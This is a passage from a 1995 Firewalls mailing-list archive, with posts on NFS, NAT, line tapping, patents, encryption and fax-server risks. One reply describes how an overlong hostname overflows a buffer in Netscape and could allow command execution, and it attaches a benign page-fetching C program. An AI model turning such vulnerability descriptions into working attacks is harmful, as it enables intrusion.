charm) /Petter > Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net > Systems Development Manager, Wm. De Jong Enterprises Inc. > +1-519-424-9007 / fax +1-519-424-2399 > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Petter Haggman Email: Petter.Haggman@lule.frontec.se Arctic Software AB Phone: +46 920 75116 , Fax: +46 920 75199 Aurorum 1, S-977 75 Lulea, Sweden NMT: 010 - 259 42 77 From firewalls-owner Tue Oct 3 02:22:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA05711 for firewalls-outgoing; Tue, 3 Oct 1995 02:19:45 -0700 Received: from inetsrv1.biss.co.uk (inetsrv1.biss.co.uk [193.115.8.97]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA05688 for ; Tue, 3 Oct 1995 02:19:14 -0700 Received: from ccmailgw.biss.co.uk by inetsrv1.biss.co.uk with SMTP (15.11/15.6) id AA07456; Tue, 3 Oct 95 10:18:27 gmt Received: from cc:Mail by ccmailgw.biss.co.uk id AA812740420 Tue, 03 Oct 95 10:13:40 EST Date: Tue, 03 Oct 95 10:13:40 EST From: Steve_Betts@ccmailgw.biss.co.uk (Steve Betts) Encoding: 1342 Text Message-Id: <9509038127.AA812740420@ccmailgw.biss.co.uk> To: chris@dejong.com, scorp@un.kiev.ua, long-morrow@CS.YALE.EDU Cc: Firewalls@GreatCircle.COM Subject: Re[2]: Mail Proxy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk long-morrow@CS.YALE.EDU wrote: >1. rot13 a uuencoded file before e-mailing it. Describe in the message >2. Use an (admittedly) inefficient format for encoding binary, such as: >3. PGP encrypt the entire message before transmitting. How will the It occurs to me that even if an human manager checks a uu-encoded attachment,how can they be sure that what they find is what it seems. With the use of a steganographic tool such as Andy Brown's S-Tools. A user can hide encrypted or binary files inside bitmap or sound files.(and also on a floppy disk, mail is only one media of many to worry about) I think that the only virus defence that makes any sense it to devolve the responsibility for detection out to the workstation.If every program, DLL etc is scanned before execution it will (should!) catch virii before they infect. This is of course no defence against the transfer of secrets or pornography. Regards Steve -- email: steve.betts@biss.co.uk (pgp key from www page) www: http://www.biss.co.uk/~steveb/ phone: (+44) 1 442 233 366 (Office GMT) Never assume my opinions are the same as my employer's. From firewalls-owner Tue Oct 3 03:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA06380 for firewalls-outgoing; Tue, 3 Oct 1995 02:57:50 -0700 Received: from rye.city.ac.uk (rye.city.ac.uk [138.40.11.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA06373 for ; Tue, 3 Oct 1995 02:57:45 -0700 Received: from mnt-pleasant.city.ac.uk by rye.city.ac.uk with SMTP (PP) id <12628-0@rye.city.ac.uk>; Tue, 3 Oct 1995 10:55:12 +0100 Received: from euston (sh391@euston.city.ac.uk [138.40.41.1]) by mnt-pleasant.city.ac.uk (8.6.12/8.6.12) with SMTP id KAA28734; Tue, 3 Oct 1995 10:55:08 +0100 Date: Tue, 3 Oct 1995 10:55:04 +0100 (BST) From: David Brownlee X-Sender: sh391@euston To: Reg Clemens cc: firewalls-digest@GreatCircle.com Subject: Re: NFS In-Reply-To: <199510030811.CAA03698@clemens.dwf.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 3 Oct 1995, Reg Clemens wrote: > [...] > > The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half > dozen file systems that are exported read-only to all the other machines > in the domain. I would like to restrict their mounting to machines within > the domain while maintaining connectivity to the outside world. > SUN's software does not support this option, it only allows specifying > specific machine names, and the list of *all* machine names overflows > some internal limit in SUN's software. > > [...] Replace the innetgr.c in libc.so with a non broken version. (I have a non broken version I can mail on request) I did that here & hapilly exported to ~200 machines (with FQDN) from SunOS 4.1.3 & 4.1.4. More recently I've replaced SunOS with NetBSD which gets it right without any help (And has a _much_ better /etc/exports syntax - I can export to 138.40.X.X easily, and map all uids (not just root) to a given uid & other nice things too). David/abs D.K.Brownlee@city.ac.uk (MIME) +44 171 477 8186 {post,host}master (abs) Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB. <<< Monochrome - Largest UK Internet BBS - telnet mono.org >>> >=- Microsoft: Abort and Retry Cancel -or- NetBSD: http://www.netbsd.org -=< From firewalls-owner Tue Oct 3 03:52:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA07100 for firewalls-outgoing; Tue, 3 Oct 1995 03:34:43 -0700 Received: from integd.integralis.co.uk (integd.integralis.co.uk [193.128.143.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA07092 for ; Tue, 3 Oct 1995 03:34:34 -0700 From: dan.collins@integralis.co.uk Received: from ccgate.integralis.co.uk by INTEGD.INTEGRALIS.CO.UK (PMDF V4.3-10 #8244) id <01HW0350EXS0000CP1@INTEGD.INTEGRALIS.CO.UK>; Tue, 03 Oct 1995 11:34:09 +0000 (GMT) Date: Tue, 03 Oct 1995 11:28 +0000 (GMT) Subject: Re: Network Address Translation To: firewalls@GreatCircle.com Message-id: <01HW0350J83M000CP1@INTEGD.INTEGRALIS.CO.UK> MIME-version: 1.0 Content-type: TEXT/PLAIN Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Re: Frank Senters query >I've heard there are a couple of commercial network address >translators >available for those of us who were foolish enough to build extensive >enterprise networks on non-NIC assigned addresses. Does anyone have >any >real-world experience with such a product? Is it possible to kludge >such >a product together on a commercial firewall? And lastly, is the >cost/effort of implementing such a product <= effort of renumbering >2k hosts? Time for a plug here! My company markets a product known imaginatively as the Internet Translation Gateway (ITG). It has been developed by us and is currently in it's second release. Right now it uses static address maps only but the next version, which is in development now, will provide dynamic maps and is scheduled for December release. If you want more info., contact andy.harris@integralis.co.uk (we are about to set up a US office but it's not on stream yet). Finally, if you really want a translation gateway integrated with a firewall, I believe Checkpoint now include some capability in their Friewall 1 product. PS I would not even think about re-numbering 2k hosts! From firewalls-owner Tue Oct 3 04:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08390 for firewalls-outgoing; Tue, 3 Oct 1995 04:27:10 -0700 Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA08366 for ; Tue, 3 Oct 1995 04:27:03 -0700 Received: from notes by cbisgate.cbis.com (5.x/SMI-SVR4) id AA05168; Tue, 3 Oct 1995 07:25:30 -0400 Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA2938; Tue, 03 Oct 95 07:26:07 -0700 Message-Id: <9510031426.AA2938@notes> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 3BDF2655247521538525624A003CB5FA; Tue, 3 Oct 95 07:26:05 To: firewalls-digest From: Warren Moore Date: 3 Oct 95 7:21:08 EDT Subject: Re: How secure is a WAN then? X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Oct 1995, Richard Reno wrote: >>> My company (me.com) has offices in Europe and headquaters in the US. If we use >>> didicated leased lines from the US to Europe (say from AT&T or MCI), can >>> someone in between get our data? >> >> Absolutely. A CO switch at one of the local phone companies in this part of >> the country was broken into and dedicated circuits tapped and listened to. >> Because of this recent incident, my present client's "private" T1 circuits, >> therefore, are link-encrypted. >> > > In fact there does not have to even be a breakin if there is collusion on > the part of someone at the CO. Correct. But the point is that there has to be either physical access (breakin) to the CO or collusion on the part of telco employees...(unless, of course, someone has been stupid enough to *not* guard the OEM port on a switch). And, while both have happened, it is a far less likely happenstance than you might think; at least, in the USofA. (Of course, paranoia keeps us in business.) Then again, if you're dealing with some other nation's PTT, who knows? There are a lot of published reports claiming that certain overseas telcos *routinely* intercept voice/data/fax on the behalf of their governments, who then provide what they see fit to their business entities. (And I can damn-near guarantee that this is true.) Encryption Anyone? Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Tue Oct 3 04:52:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08856 for firewalls-outgoing; Tue, 3 Oct 1995 04:48:51 -0700 Received: from uu8.psi.com (uu8.psi.com [38.146.10.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA08849 for ; Tue, 3 Oct 1995 04:48:47 -0700 Received: from [192.104.81.8] by uu8.psi.com (5.65b/4.0.940727-PSI/PSINet) via SMTP; id AA26030 for Firewalls@GreatCircle.COM; Tue, 3 Oct 95 07:46:35 -0400 Received: from ccMail by PO2.VRINET.COM (SMTPLINK V2.10.05) id AA812731523; Tue, 03 Oct 95 07:44:52 EST Date: Tue, 03 Oct 95 07:44:52 EST From: "Daniel Dutch" Message-Id: <9509038127.AA812731523@PO2.VRINET.COM> To: avalon@coombs.anu.edu.au, Larry Helber Cc: Firewalls@GreatCircle.COM Subject: Re[2]: Firewall-1: Patent-pending ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this is getting off the topic of firewalls but there is legislation going before the house this week that will change this. -Info will be disclosed 18 months after the application is filed, period. -Patent will be good 20 years from date of application, not date of patent issue. (Previously, it was 17 years from date of issue.) -Daniel Dutch ------- >patent pending then you will not get any information out of the patent >office. A patent number and the information contained in the submitted >documents does not have to be disclosed until the patent is appoved. Also a >pending patent may be amended to that will defere the issue date of the >patent. As long as you keep updating the patent on a yearly basis your >patent will never get issued. > > >This might be streching the charter a bit... > >In the advertising material for Checkpoint's Firewall-1 (version 1.2) >which I picked up recently, there are two mentions of "patent pending". > >There is NO mention of any application numbers that I can find or any >further information on this. > >Having sent e-mail to checkpoint last week and having received no reply >(surprised - NOT) I'm wondering if this is just a game. > >Can anyone provide some more information about the pending patents, such >as application numbers or the applications themselves ? > >Thanks, >Darren > > From firewalls-owner Tue Oct 3 06:23:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA10424 for firewalls-outgoing; Tue, 3 Oct 1995 06:00:43 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA10307 for ; Tue, 3 Oct 1995 06:00:19 -0700 Received: from TIS.COM by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id FAA14308; Tue, 3 Oct 1995 05:39:26 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa19592; 3 Oct 95 8:42 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma028016; Tue, 3 Oct 95 08:25:40 -0400 Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA10278; Tue, 3 Oct 95 08:41:40 EDT Message-Id: <9510031241.AA10278@tis.com> X-Sender: avolio@sol.tis.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 03 Oct 1995 08:42:43 -0400 To: Tham Huei Hwan , Marcus Antonio - Projeto ISODE From: Frederick M Avolio Subject: Re: Public Domain FireWall Software Cc: FireWalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The TIS Internet Firewall Toolkit is freely available, licensed code. It is available at ftp.tis.com. It is not public domain, however. Please read the license agreement. Fred At 08:20 AM 10/3/95 +0800, Tham Huei Hwan wrote: >Hi, > >You can obtain fwtk(firewalls tool kit) from ftp.tis.com > > >On Fri, 29 Sep 1995, Marcus Antonio - Projeto ISODE wrote: > >> >> Helo FireAlls >> >> My name's Marcus Antonio, and I'm a Coputer Science student at >> Brasil, and I have to implement a network security system. I'd like to know >> how can I get some public domain FireWall software. I work with AIX system. >> Any information wold be very important. >> >> Thank you very much... >> >> >> _______________________________________________________________________________ >> >> _/_/_/_/ _/_/_/_/ >> _/_/_/_/ _/_/_/_/ >> _/_/ _/_/ _/_/ _/_/ _/_/_/_/ _/_/_/_/ _/_/_/_/ _/ _/ _/_/_/ >> _/_/ _/_/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ >> _/_/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ >> _/_/ _/_/ _/_/_/_/ _/ _/_/ _/ _/ _/ _/_/_/_/ >> _/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ >> _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/_/_/ _/_/_/_/ >> >> Marcus Antonio Almeida Rodrigues >> >> UECE >> Universidade Estadual do Ceara' >> >> LAR >> Laboratorio Multiinstitucional de Redes e Sistemas Distribuidos >> >> >> e-Mail:marcus@fortal.uece.br >> URL: http://www.uece.br/~marcus/ >> _______________________________________________________________________________ >> > > > > From firewalls-owner Tue Oct 3 06:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA10572 for firewalls-outgoing; Tue, 3 Oct 1995 06:12:55 -0700 Received: from uu5.psi.com (uu5.psi.com [38.145.226.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA10565 for ; Tue, 3 Oct 1995 06:12:52 -0700 Received: by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA20048 for ; Tue, 3 Oct 95 09:00:40 -0400 Date: Tue, 3 Oct 95 08:46:36 EDT From: hhs@teleoscom.com (Chip Sharp X-6424) Received: by teleoscom.com (4.1/3.2.083191-Teleos Communications Inc.) id AA03079; Tue, 3 Oct 95 08:46:36 EDT Message-Id: <9510031246.AA03079@teleoscom.com> To: Firewalls@GreatCircle.COM In-Reply-To: firewalls-digest-owner@GreatCircle.COM's message of Mon, 2 Oct 1995 13:06:22 -0700 <199510022006.NAA03945@miles.greatcircle.com> Subject: Re: How secure is a WAN then? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Richard Reno >In fact there does not have to even be a breakin if there is collusion >on the part of someone at the CO. Long ago ... In one of our current spate of "Telecom Reform" laws, the FBI put in a requirement that all CO's have a "wiretap" port that would allow them to wiretap all digital calls. Theoretically, they are supposed to have a court order before doing so ;-). ======================================================================= Hascall H. ("Chip") Sharp Teleos Communications, Inc. Sr. Systems Engineer 2 Meridian Road Eatontown, NJ 07724 USA voice: +1 908 544 6424 fax: +1 908 544 9890 email: hhs@teleoscom.com web: http://www.teleoscom.com/ ======================================================================== From firewalls-owner Tue Oct 3 07:23:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12013 for firewalls-outgoing; Tue, 3 Oct 1995 07:03:12 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA12005 for ; Tue, 3 Oct 1995 07:03:06 -0700 Message-Id: <199510031403.HAA12005@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA197318869; Wed, 4 Oct 1995 00:01:09 +1000 From: Darren Reed Subject: named on port > 1023 ? To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Wed, 4 Oct 1995 00:01:09 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1141 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone run named on a port > 1023 as a non-root user ? >From the 4.9.3 BETA26 man page: ... -p Use nonstandard port numbers. The default is the standard port number as returned by getservby- name(3) for service ``domain''. The argument can specify two port numbers separated by a slash (``/'') in which case the first port is that used when contacting remote servers, and the second one is the service port bound by the local instance of named. This is used mostly for debugging purposes. ... Of course, how does one fix it so things work normally ? Need to relay TCP port 53 -> your DNS port, and then a fairly intelligent program (could be spawned by inetd but!) which received packets on port 53, kept some state info about the packet and the DNS request and then made a new request (recording the matching information with the incoming one) to the name server on the non standard port. The UDP bit is probably the most complicated. Has anyone done this or tried ? Anticipated problems ? darren From firewalls-owner Tue Oct 3 07:24:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12111 for firewalls-outgoing; Tue, 3 Oct 1995 07:08:01 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA12104 for ; Tue, 3 Oct 1995 07:07:57 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA28117; Tue, 3 Oct 95 09:44:36 -0400 Date: Tue, 3 Oct 95 09:44:36 -0400 Message-Id: <9510031344.AA28117@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: Encryption strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian J-B's excellent post raises a number of issues concerning security in general. Having been exposed to a KW-26 back in 196 I have been around it for longer than many here have been alive & have become somewhat opinionated on the subject. Now I do not think for a minute in "encrypt everything and you do not need a firewall" being a disbeliever in single layer solutions. It is a valuable defense, potentially stronger than anything we have today, but enforces confidentiality and integrity (trustability) only, it does nothing for the availability issue and is subject to all manner of attacks (man-in- the-middle being the most difficult to protect against). Further, key management is a perenniel problem. "How is that first secure link established ?" is a chicken and the egg kind of problem. Today out-of- channel is the most popular answer as demonstrated by Netscape but is either a logistical nightmare or potential weakness. (It might be cheaper to buy ViaSign than to break their certificates). For all of that, I believe that good encryption will be the element that begins to make our jobs easier, both via creation of secure links between Firewalls/Enterprises and through double wrapping at the application level. We also must realize that strengthening electronic security with also increase attacks at the physical and human level and must prepare for that as well. Finally, I believe that after a lot of handwaving and rhetoric, governments are going to realize that while laws regulating encryption can be passed (sovereign rights), they cannot effectively be enforced for the very reasons that we have just been discussing concerning blocking of E-Mail. In order to prosecute a violation, in most democracies it will first be necessay to prove that encryption was used. Though easy to do today, it is trivial to make difficult (see Stenography). Once one government accepts this fact, it will be easier for others. I expect this will happen in Europe (The Netherlands ?) first. And then we will see an avalanche of products. The technology is easy and well known. A final note: governments have already admitted compliance with the needs/ wishes of multinational corporations (most financial transactions are exempt from ITAR for example). Once the major corporations of the world decide they need strong crypto, it will happen (and already is). Warmly, Padgett From firewalls-owner Tue Oct 3 08:25:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA13738 for firewalls-outgoing; Tue, 3 Oct 1995 08:16:56 -0700 Received: from lehman.Lehman.COM (Lehman.COM [192.147.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA13721 for ; Tue, 3 Oct 1995 08:16:46 -0700 From: carson@lehman.com Received: (from smap@localhost) by lehman.Lehman.COM (8.6.12/8.6.12) id LAA25126; Tue, 3 Oct 1995 11:15:16 -0400 Received: from relay.mail.lehman.com(192.9.140.112) by lehman via smap (V1.3) id tmp025111; Tue Oct 3 11:14:15 1995 Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA24452; Tue, 3 Oct 95 11:14:08 EDT Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros. V1.6) id AA07774; Tue, 3 Oct 95 11:14:04 EDT Received: by dragon.lehman.com (5.0/Lehman Bros. V1.5) id AA04489; Tue, 3 Oct 1995 11:14:04 -0400 Date: Tue, 3 Oct 1995 11:14:04 -0400 Message-Id: <9510031514.AA04489@dragon.lehman.com> To: peter@nmti.com (Peter da Silva) Cc: rik@spirit.com, Firewalls@GreatCircle.COM Subject: Re: CERT and Firewalls BOFs In-Reply-To: <9509281542.AA04617@sonic.nmti.com.nmti.com> References: <199509270045.RAA01228@apache.spirit.com> <9509281542.AA04617@sonic.nmti.com.nmti.com> Reply-To: carson@lehman.com Content-Length: 1680 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Carson asked the audience [about 110 persons] if he should rewrite the > ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or > should he work with Brimstone SOS [which also has a license similar to > TIS for their proxies, but fewer services], because the code quality is > better. Why can't he just use whichever proxies he wants. They won't wake up and go "Ick, Freestone, I'm outta here!"... While I could use anyting I want to, I'd like to contribute my code back to the community. There are a fairly large number of folks using my TIS patches, particularly the ftp PASV support. I had intended a straw poll to see how many folks lives would be made less spiffy if I stopped my work on the fwtk and went to a different code base. I, as usual, managed to put my foot in my mouth and irritate (at least) Marcus - not my intent at all. My current plans are to add the PORT <-> PASV code to the fwtk, and then stop work on it (barring any new surprises like the syslog nastiness). After that I'll be doing a proof-of-concept implementation of an application proxy in Java to see what problems (if any) I'll encounter. In theory, it should eliminate vast numbers of opportunities to screw up - particularly buffer overruns. If I'm a _really_ good boy, I'll even try and write a paper on the results (performance, implementation difficulty, security, etc.). Of course, I may get lazy/busy, so no promises that I'll finish and please don't bother to ask me how it's going - I'll let y'all know when I have anything even vaguely presentable. -- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com From firewalls-owner Tue Oct 3 09:00:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14543 for firewalls-outgoing; Tue, 3 Oct 1995 08:43:05 -0700 Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14534 for ; Tue, 3 Oct 1995 08:42:58 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id LAA00704 for ; Tue, 3 Oct 1995 11:41:13 -0400 Date: Tue, 3 Oct 1995 11:41:13 -0400 Message-Id: <199510031541.LAA00704@psyche.the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Anton J Aylward Subject: Re: Web Browser Test -- WHAT!!!! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: 02 Oct 1995 17:03:55 -0700 >From: Jacob Hinther >To: Firewalls >Subject: Web Browser Test >Sender: firewalls-owner@GreatCircle.COM > >Test your web browser! > > http://www.c2.org/ > http://www.c2.org/hackmsoft/ > http://www.c2.org/hacknetscape/ > >Jake > Er, without some idea of what this does, I'd rather not. How do I know this isn't some kind of bobm which will hit a bug (!?!) in Netscape whch will do strange things with my files or configuration? We've thrashed the WordVirus, couldn't this bhe something of the same ilk. Jake - whoever you are - if you really want us to try this, explain what it does, why it does it, and why you are presenting it to us. Without some credentials this just stirs our - well MY - paranoia. Like the mail address and the URL being so different, and the URL being a '.org' rather than a well known site. /anton - from paranoia city -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Tue Oct 3 11:22:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18001 for firewalls-outgoing; Tue, 3 Oct 1995 11:01:07 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA17987 for ; Tue, 3 Oct 1995 11:01:03 -0700 From: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Received: from alau.al.mt.np.els-gms.att.net by relay3.UU.NET with SMTP id QQzjwp07058; Tue, 3 Oct 1995 13:59:21 -0400 Received: from mhs!pfg1 by /C=US/AD=ATTMAIL;Tue Oct 3 17:57:16 -0000 1995 Received: by /C=us/AD=attmail/PD=pfg1;Tue Oct 3 12:25:34 -0500 1995 Date: Tue, 03 Oct 1995 12:25:34 -0500 Transport-Options: /STANDARD/REPORT Original-Encoding-Types: ASCII Disclose-Recipients: yes Subject: fax server security P2-Originator: mhs!pfg1/G=BECKY/S=HEROLD To: firewalls@greatcircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This topic is marginally related to firewalls. Please excuse this not-so-appropriate posting, but I've posted this to several other security-related lists over the past couple of weeks and I've not had a single reply. With the vast amount of knowledge in the readership of this list, I'm hopeful someone reading this message can help me out. We're in the test/pilot stages of installing fax servers on our network. We're looking at the Cheyenne FAXserve product running on Netware 3.12 for a limited number of employees. Is anyone aware of any risks for unauthorized access by using the fax only boards within the system? Is it possible to hack through these specialized modems into our network? Would it be possible for someone to send an executable file of any kind through the board to any of our networked computer systems? Should we put a firewall in front of these fax servers? Thanks in advance for your thoughts/information! Becky Herold Sr. Systems Analyst, Information Protection The Principal Financial Group 515-248-8521 herold.becky@MHS-PFG1.attmail.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The opinions presented in this message are my own and do not necessarily represent the opinions of The Principal Financial Group. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Tue Oct 3 11:30:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18286 for firewalls-outgoing; Tue, 3 Oct 1995 11:13:27 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18262 for ; Tue, 3 Oct 1995 11:13:19 -0700 Date: Tue, 3 Oct 1995 18:13:42 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id SAA06082 for firewalls@greatcircle.com; Tue, 3 Oct 1995 18:13:42 GMT Message-Id: <199510031813.SAA06082@real.com> To: firewalls@greatcircle.com Subject: Re: Web Browser Test -- WHAT!!!! Content-Type: X-sun-attachment Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- X-Sun-Data-Type: text X-Sun-Data-Description: text X-Sun-Data-Name: text X-Sun-Charset: us-ascii X-Sun-Content-Lines: 41 > > Er, without some idea of what this does, I'd rather not. > How do I know this isn't some kind of bobm which will hit a bug (!?!) in > Netscape > whch will do strange things with my files or configuration? > Can you not telnet to port 80 of his machine issue a few commands, and get the HTML right to your screen, where its harmless? I did and read in it, and its a memory leak (just a guess) in Netscape (lynx didnt crash on the long hostnames).. All it is is a hostname about 512 bytes long.. That causes an overflow of the buffer (so in theory you could play games with the stack and have their program execute commands, after all netscape has a habit of telling what os it comes from when it connects).. Also, following one of the links I found a bunch of discussion about that hole, and about the seed for the random number generator.. There is even a c file with an exploit somewhere on the links (the link goes to france, and that is all I remember) > Jake - whoever you are - if you really want us to try this, explain what it > does, why it does it, > and why you are presenting it to us. Without some credentials this just > stirs our - well MY - paranoia. if you are paranoid, perhaps you should take a couple of precautions (like telnetting to the port and reading the HTML, then see if it will exploit anything other than a core dump).. Inaction may mean that you never learn what is going on (and dont get the patch which is available at that site too).. For all those that want to telnet to an URL but dont know how (so that you can verify data like this in the future) I included a simple program that will do this.. ---------- X-Sun-Data-Type: c-file X-Sun-Data-Description: c-file X-Sun-Data-Name: webthief.c X-Sun-Charset: us-ascii X-Sun-Content-Lines: 86 /* This program allows you to connect to a WWW site, and get a specific HTML * (note this program wont get the cgi, only its output).. * I dont know what calue or use it may have for anyone, but hey, its * a fairly simple program.. * No warantee is implied, no guearantee of any kind is implied, etc.. * All that other standard disclaimer stuff too * Just in case that isnt enough USE AT OWN RISK :) * * I made it so that the HTML goes out on stdout, and the messages go * on stderr, so simple redirecting will enable you to save an HTML to * a file.. */ #include #include #include #include #include #include #include int bindsocket(port,host) int port; char *host; { int s; u_long address; struct sockaddr_in sin; struct hostent *hp; if((address = inet_addr(host)) == -1L) { if((hp = gethostbyname(host)) == (struct hostent *)0) { fprintf(stderr,"%s: address unknown or unparsable\n",host); exit(1); } bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length); } else bcopy((char *)&address,(char *)&sin.sin_addr,sizeof(address)); if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } sin.sin_family=AF_INET; sin.sin_port=htons(port); fprintf(stderr,"Connecting to %s on port %d...\n",host,port); if (connect(s,&sin, sizeof sin)<0) { perror("connect"); exit(1); } fprintf(stderr,"Connected!\n"); return(s); } main(argc,argv) int argc; char **argv; { int port=80,s; char line[2048]; if(argc < 3 || argc > 4) { fprintf(stderr,"Usage: %s machine html [port]\n",argv[0]); exit(1); } if(argc == 4) port=atoi(argv[3]); s=bindsocket(port,argv[1]); sprintf(line,"GET %s HTTP/1.0\nUser-Agent: Mozilla/1.1N (X11; I; webthief 1.0 unix)\nAccept: */*\nAccept: image/gif\nAccept: image/x-xbitmap\nAccept: image/jpeg\n\n",argv[2]); write(s,line,strlen(line)); while(strlen(line)!=0) { bzero(line,sizeof(line)); read(s,line,sizeof(line)); printf("%s",line); } close(s); fprintf(stderr,"All done!\n"); } From firewalls-owner Tue Oct 3 11:52:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18592 for firewalls-outgoing; Tue, 3 Oct 1995 11:26:53 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18585 for ; Tue, 3 Oct 1995 11:26:50 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.6.11/8.6.9) id NAA12827 for ; Tue, 3 Oct 1995 13:21:51 